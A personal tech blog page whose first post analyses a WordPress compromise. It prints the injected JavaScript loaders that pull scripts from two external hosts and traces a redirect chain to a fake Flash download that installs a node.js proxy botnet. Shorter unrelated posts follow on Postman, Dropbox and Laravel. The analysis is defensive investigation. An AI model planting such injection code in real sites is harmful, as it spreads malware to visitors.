What happens if your WordPress is hacked – or: How botnets are created with hijacked Worpess, fake Flash downloads and node.js

Veröffentlicht am 23.11.2015, 14:14 Uhr


I just noticed the website of an old employer has been hacked and some JavaScript is injected into their corporate website that runs on WordPress. Ouch. Of course I notified them about it and they’re just trying to figure out what happened and how to fix it.

This taken care of, I of course started looking at what the attackers placed there:

(function() {
var gcse = document.createElement('script');
gcse.type = 'text/javascript';
gcse.async = true;
gcse.src = "http://theboatersnetwork.com/js/main1.js";
var s = document.getElementsByTagName('script')[0];
s.parentNode.insertBefore(gcse, s);

(function() {
var gcse = document.createElement('script');
gcse.type = 'text/javascript';
gcse.async = true;
gcse.src = "http://cjccontabil.com.br/wp-content/themes/Hermes/main1.js";
var s = document.getElementsByTagName('script')[0];
s.parentNode.insertBefore(gcse, s);

(Actually the second script is inserted twice – probably the same post was hacked again and the payload placed a second time – even hacker forget stuff the did before.)

So we see there are two files included to this nice corporate website:

Let’s have a look at them.


(Copy of the file if it gets removed: http://pastebin.com/hyNmgD6b)

This checks if there is a ‚doRedirect‘ cookie set, if not it redirects to http://bit.do/bvSyy. This pseudo bit.ly link (note the .do domain instead of .ly) redirect to some link. It also offers statistics on http://bit.do/bvSyy-, so we know this redirect has already been used (at the time of writing) 18.000 times. And we also see all the domains that include this link. Ouch. (Now I notified some other German domains – can’t notify them all :/)

The link it redirects you to is http://w5ea5z6gf.homepage.t-online.de/js/20140427232734/ which is a faked Flash Player download site where you can download a file called http://btob.es/OLD_20100113/blogbtob/flashplayer19ax_ma_install.exe . This is of course not a Flash Player, but a ZIP that extracts itself.

In there you find some node.js binaries, a script to load node if it is missing and an index.js. If you are brave enough to execute this, it downloads an updater.js, version.txt (that only says „93“) and script.js:

updater.js is basically a pimped out version of the index.js we already have, but can basically do the same stuff. script.js is another beast with 729 lines of code. Executing this you get some output like this:

> node script.js
{ type: ‚createProxy‘, id: 0 }
{ type: ‚createProxy‘,
attachTo: { ip: ‚‘, port: 53963 },
id: 1 }
creating attached proxy:
attached to

So it seems this is connecting to a proxy in Paraguay and … I don’t know, because I didn’t (try to) understand what the rest of script.js actually does after that. Best guess is it connects to a proxy and gets some commands, also it creates a proxy itself on my machine that can be used by other nodes to connect to and use. Someone has this list of proxies to do whatever he wants with my machine in a node.js context – and that’s a lot of things he can do.

(Anyone wants to look at script.js a bit more and tell me what it actually does? I’m curious…)


(Copy of the file if it gets removed: http://pastebin.com/VS11VZmu)

This file is a bit more straight forward, although I absolutely don’t get why it does what it does:

  1. First it POSTs to a server to get a list of keywords
  2. Then it uses these keywords to GET a search on Google API: https://www.googleapis.com/customsearch/v1element
  3. It gets the URLs of the results and puts them in a list…
  4. … that is then POSTed back to the server while getting new keywords
  5. goto 1

It uses a proper Google API key to make these requests, so Google at least know what Google account is connected to these requests. The server it sends to is a Polish IP that is known for spam, so make of that what you will. But I honestly don’t know what the use of this activity is and how you could possible gain something from this.

(Any idea?)


Someone hacks WordPress websites and includes strange .js files that a) lead to fake Flash downloads that install a botnet on your PC and b) abuse your browser to get URLs from a Google search.

My former employer is still trying to figure out if this is serious and who is reponsible for fixing the modified wordpress posts… this could take some time.

Tipico Pay ist eine Einzahlungs-App für den Sportwetten-Anbieter Tipico.

Thema: Kram 7 Kommentare - :)

WinSCP Files Custom Command for WinMerge diff

Veröffentlicht am 30.4.2015, 10:53 Uhr

Local command:

„C:\Program Files (x86)\WinMerge\WinMergeU.exe“ /n /t=2 /q ! !^!

Thema: Kram Keine Kommentare - :(

Notepad++ backup folder

Veröffentlicht am 26.3.2015, 15:03 Uhr


Thema: Kram Keine Kommentare - :(

Postman: Use result data in test scripts (and save to environment)

Veröffentlicht am 10.3.2015, 21:41 Uhr

Just use ‚request‘ in the test script:

Makes so many things easier :)

Postman (REST Client) Tests

Veröffentlicht am 31.10.2014, 16:04 Uhr


// save response in env
var data = responseBody;
postman.setEnvironmentVariable("data", data);

// parse value from json and save in env
var data = JSON.parse(responseBody);
postman.setEnvironmentVariable("device_id", data.id);

// parse array from json and safe as string and save in env
var data = JSON.parse(responseBody);
var product = JSON.stringify(data[0]);
postman.setEnvironmentVariable("contentful", product);

// parse array from json, change value, and safe as string and save in env
var data = JSON.parse(responseBody);
data.locale = "en_US";
var device_update = JSON.stringify(data);
postman.setEnvironmentVariable("device_update", device_update);

### TESTS ###

// test resposonse code
tests["Status code is 200"] = responseCode.code === 200;

// test if response is empty
var data = JSON.parse(responseBody);
tests["Transaction list is empty"] = data.length === 0;

// test if body contains value
tests["Body contains string" + environment.device_id] = responseBody.has(environment.device_id);

// test exact values of json
var data = JSON.parse(responseBody);
tests["transaction.id is " + environment.transaction_id] = data.id === environment.transaction_id;
tests["transaction.state is IN_PROGRESS"] = data.state === "IN_PROGRESS";

Managing Twitter Lists

Veröffentlicht am 9.11.2013, 22:37 Uhr

I started to group my „twitter users I follow“ (Why is there no better word?) in (public and private) thematic lists to be able to follow them seperately. List management in Twitter’s web and mobile apps lacks a lot of features, so I went to trusted Google to find what is out there. Here are my 3 recommentations:

With these tools I was able to move some people around and dramatically clean up my lists.

Now to find (or create) a Twitter client that is made for lists and this style of reading. (On Windows, I recommend Tweetdeck.)

How to use private and business Dropbox accounts on Windows (7) at the same time?

Veröffentlicht am 4.11.2013, 22:17 Uhr

There seem to be two working options:

  1. http://nionsoftware.com/dbpahk/instructions
    This one got a nice installer and you can choose a colored icon so you can actually recognize your private/business Dropbox systray icon.
    But it uses an older Dropbox installer.
  2. http://semi-legitimate.com/blog/item/multiple-dropbox-instances-on-windows-7
    Here you need to create a second user account so Dropbox can save its configuration somewhere. Nice hack, but very hacky.

I’m testing (1) right now and for now it seems to work great. Hope it keeps working.

Thema: Kram Keine Kommentare - :(

Dropbox for Business

Veröffentlicht am 4.11.2013, 10:26 Uhr

I had to research Dropbox for Business today. Here are the most interesting links and help files:

Nice product, well executed. And if you want some advice: Create a business account as soon as possible to avoid the moving of stuff and shared folders. That can really be a pain.

WordPress Multisite

Veröffentlicht am 3.11.2013, 23:00 Uhr

Today I spent some time reading up on WordPress Multisite. It was born out of WordPress MU and included in the Core of WordPress since version 3.0, but I never got around to really understand and use it. Here we go:



Special Cases



Multisite seems to work fine but sometimes behaves a bit strange, especially if you want to do special things that it’s not (really) supposed to do. The documentation lacks a lot (note to myself: maybe help) and the not-in-the-focus development from MU to Multisite causes lots of problems with old blogs posts, strange wording and information, confusing everybody. So I’m going to try using it.

Laravel 4, Eloquent: Check if there is a Model with certain key-value pair in a Collection

Veröffentlicht am 17.10.2013, 16:47 Uhr

I wanted to find out if there already is a Model with a certain value for a certain column in a Collection that I retrieved realier in my code, e.g. is there already a User with name = Müller in my $users Collection?

$users->contains() can only check if there is a model with a certain primary key, and there also is no method to trivially search through all Models. Of course this all could be hacked together somehow*, but after a bit of searching I found this nice way to solve my question:

$value = 'Müller';
$key = 'name';
if(in_array($value, $users->lists($key))) { ... }

Collection->lists() gets an array with all the values of the Model for the requested key. Checking if our new value is in there, is super simple.

*Of course I first tried it this way:

  1. use $collection->filter() and then count the result
  2. hack $collection->contains() +$collection->find() to accept a field name as a parameter
  3. see 2, but copy the methods as private methods to my controller instead of tinkering with the framework code directly

All 3 solutions worked, but needed lots of ugly code.

14 queries. 0,268 seconds.